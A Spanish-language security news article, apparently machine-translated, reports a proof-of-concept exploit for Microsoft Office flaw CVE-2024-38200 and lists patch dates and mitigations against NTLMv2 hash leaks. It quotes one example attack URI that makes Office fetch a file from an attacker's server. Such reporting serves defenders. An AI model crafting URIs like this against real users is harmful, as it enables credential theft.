Los investigadores de seguridad han lanzado un exploit de prueba de concepto (PoC) para la vulnerabilidad CVE-2024-38200 de Microsoft Office recientemente revelada. Esto podría permitir a un atacante capturar el hash NTLMv2 del usuario.
Esta falla de alta gravedad afecta a varias versiones de Microsoft Office, incluidas Office 2016, Office 2019, Office LTSC 2021 y Microsoft 365 Apps for Enterprise.
Esta vulnerabilidad, reportada por primera vez por Jim Rush de PrivSec Consulting y Metin Yunus Kandemir del Red Team de Synack, permite a un atacante establecer una conexión NTLM saliente desde el sistema de una víctima a un servidor remoto controlado por el atacante.
Cuando se produce esta conexión, Windows envía automáticamente el hash NTLM del usuario, incluida la contraseña hash, al servidor del atacante.
Analice enlaces sospechosos utilizando la nueva herramienta de navegación segura de ANY.RUN: pruébela gratis
Un exploit PoC publicado en GitHub muestra cómo explotar esta falla utilizando el esquema URI de Office.
Al crear un URI especialmente formado (como ms-excel:ofe|u|http://192.168.1.7/leak.xlsx), un atacante puede engañar silenciosamente a las aplicaciones de Office para que accedan a archivos remotos. Esto le permite capturar hashes NTLMv2 para los protocolos SMB y HTTP.
Los investigadores señalan que esta vulnerabilidad es particularmente peligrosa cuando se combina con ciertas configuraciones de Objeto de política de grupo (GPO) para propiedades de Internet.
Las aplicaciones de Office realizan automáticamente la autenticación NTLM si se aplican ciertas configuraciones, como agregar un rango de IP a sitios confiables o habilitar el inicio de sesión automático para la autenticación del usuario, lo que hará que sea aún más fácil de explotar.
Microsoft lanzó una solución parcial mediante la implementación de funciones el 30 de julio de 2024, pero el parche final se lanzó con una actualización el 13 de agosto de 2024. Mientras tanto, los expertos en seguridad recomiendan varias medidas de mitigación, incluida limitar el tráfico NTLM saliente a servidores remotos, agregar usuarios al grupo de seguridad Usuarios protegidos y bloquear el tráfico saliente desde el puerto TCP 445. Masu.
El lanzamiento de este exploit PoC resalta la urgencia de que las organizaciones apliquen los próximos parches e implementen las mitigaciones recomendadas.
Esto también es un recordatorio de los continuos riesgos asociados con la autenticación NTLM, que Microsoft ha desaprobado oficialmente en favor de alternativas más seguras como Kerberos.
A medida que el panorama de amenazas continúa evolucionando, los administradores de sistemas y los profesionales de la seguridad pueden mantenerse informados sobre nuevas vulnerabilidades y proteger sus redes y usuarios de posibles ataques que exploten fallas como CVE-2024-38200. Es necesario tomar medidas inmediatas para hacerlo.
Seminario web gratuito sobre cómo proteger su pequeña empresa de las ciberamenazas avanzadas -> Seminario web gratuito
PoC Exploit Released for Microsoft Office 0-day Flaw – CVE-2024-38200
